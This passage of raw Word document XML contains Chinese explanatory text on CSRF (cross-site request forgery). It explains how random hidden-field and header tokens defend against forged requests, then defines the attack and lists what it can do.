      </w:r>
      <w:r w:rsidR="00A8086E">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>一般不存在</w:t>
      </w:r>
      <w:r w:rsidR="00A8086E">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>hidden</w:t>
      </w:r>
      <w:r w:rsidR="00A8086E">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>隐藏域</w:t>
      </w:r>
      <w:r w:rsidR="00A8086E">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> token,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>即使在页面中增加</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>hidden token,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>它也没办法获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>中的随机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="005E7590">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>并且由于</w:t>
      </w:r>
      <w:r w:rsidR="005E7590">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>是随机的也</w:t>
      </w:r>
      <w:r w:rsidR="00AC56B7">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>很难猜测出来</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA4708" w:rsidRDefault="00C63AB0" w:rsidP="00FA4708">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hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>假如前端</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Post</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>过来的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>AJAX</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>请求是有伪造网站提交过来的，</w:t>
      </w:r>
      <w:r w:rsidR="00A8086E">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>一般不存在</w:t>
      </w:r>
      <w:r w:rsidR="00A8086E">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">header </w:t>
      </w:r>
      <w:r w:rsidR="00A8086E">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>请求头</w:t>
      </w:r>
      <w:r w:rsidR="00A8086E">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>token,</w:t>
      </w:r>
      <w:r w:rsidR="005E7590">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>即使在请求头中加入</w:t>
      </w:r>
      <w:r w:rsidR="005E7590">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>header token,</w:t>
      </w:r>
      <w:r w:rsidR="00FA4708" w:rsidRPr="00FA4708">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FA4708">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>它也是没办法获取</w:t>
      </w:r>
      <w:r w:rsidR="00FA4708">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidR="00FA4708">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>中的随机</w:t>
      </w:r>
      <w:r w:rsidR="00FA4708">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>token</w:t>
      </w:r>
      <w:r w:rsidR="00FA4708">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>值</w:t>
      </w:r>
      <w:r w:rsidR="00FA4708">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00AC56B7" w:rsidRPr="00AC56B7">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AC56B7">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>并且由于</w:t>
      </w:r>
      <w:r w:rsidR="00AC56B7">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>token</w:t>
      </w:r>
      <w:r w:rsidR="00AC56B7">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>是随机的也很难猜测出来</w:t>
      </w:r>
      <w:r w:rsidR="00FA4708">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C63AB0" w:rsidRDefault="00A8086E"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hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>被攻击的网站是可以带上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidR="00F619DF">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，但是恶意</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>网站是没办法</w:t>
      </w:r>
      <w:r w:rsidR="00F619DF">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00F619DF">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>当时是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>假设不存在其他</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>漏洞</w:t>
      </w:r>
      <w:r w:rsidR="00F619DF">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>可以获取</w:t>
      </w:r>
      <w:r w:rsidR="00F619DF">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidR="00F619DF">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>前提下。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD5392" w:rsidRPr="00DD5392" w:rsidRDefault="00DD5392" w:rsidP="00A94D59">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="136" w:beforeAutospacing="0" w:after="136" w:afterAutospacing="0" w:line="342" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD5392">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00DD5392">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Forgery Request</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD5392">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>里面没有</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD5392">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>hidden token</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD5392">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>这一项，即使写进去，也很难猜到。而正常的</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD5392">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>client</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD5392">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>端，在发送</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD5392">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>request</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD5392">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的时候会包含这一项，和服务器端对上号，就起到了验证的作用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD5392" w:rsidRDefault="00DD5392" w:rsidP="00A94D59">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="136" w:beforeAutospacing="0" w:after="136" w:afterAutospacing="0" w:line="342" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD5392">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00DD5392">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>其中有一点需要注意，攻击者在攻击过程中永远是</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD5392">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD5392">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>瞎</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD5392">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD5392">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的。他不能得到服务器端的应答结果。每次只是</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD5392">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD5392">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>盲目</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD5392">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD5392">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>地去试探。所以说他不能先请求然后再利用</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD5392">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>token</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD5392">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F619DF" w:rsidRPr="006D797E" w:rsidRDefault="00F619DF" w:rsidP="00A94D59">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="136" w:beforeAutospacing="0" w:after="136" w:afterAutospacing="0" w:line="342" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007A6148" w:rsidRPr="007A6148" w:rsidRDefault="007A6148"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hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94D59" w:rsidRDefault="00465C7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hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00A94D59">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r w:rsidR="00A94D59">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidR="00A94D59">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Cross-site request forgery</w:t>
      </w:r>
      <w:r w:rsidR="00A94D59">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>），中文名称：跨站请求伪造，也被称为：</w:t>
      </w:r>
      <w:r w:rsidR="00A94D59">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>one click attack/session riding</w:t>
      </w:r>
      <w:r w:rsidR="00A94D59">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，缩写为：</w:t>
      </w:r>
      <w:r w:rsidR="00A94D59">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>CSRF/XSRF</w:t>
      </w:r>
      <w:r w:rsidR="00A94D59">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>。</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你这可以这么理解</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>攻击：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>攻击者盗用了你的身份，以你的名义发送恶意请求</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>能够做的事情包括</w:t>
      </w:r>
      <w:r w:rsidRPr="00975A7A">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>：以你名义发送邮件，发消息，盗取你的账号，甚至于购买商品，虚拟货币转账</w:t>
      </w:r>
      <w:r w:rsidRPr="00975A7A">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
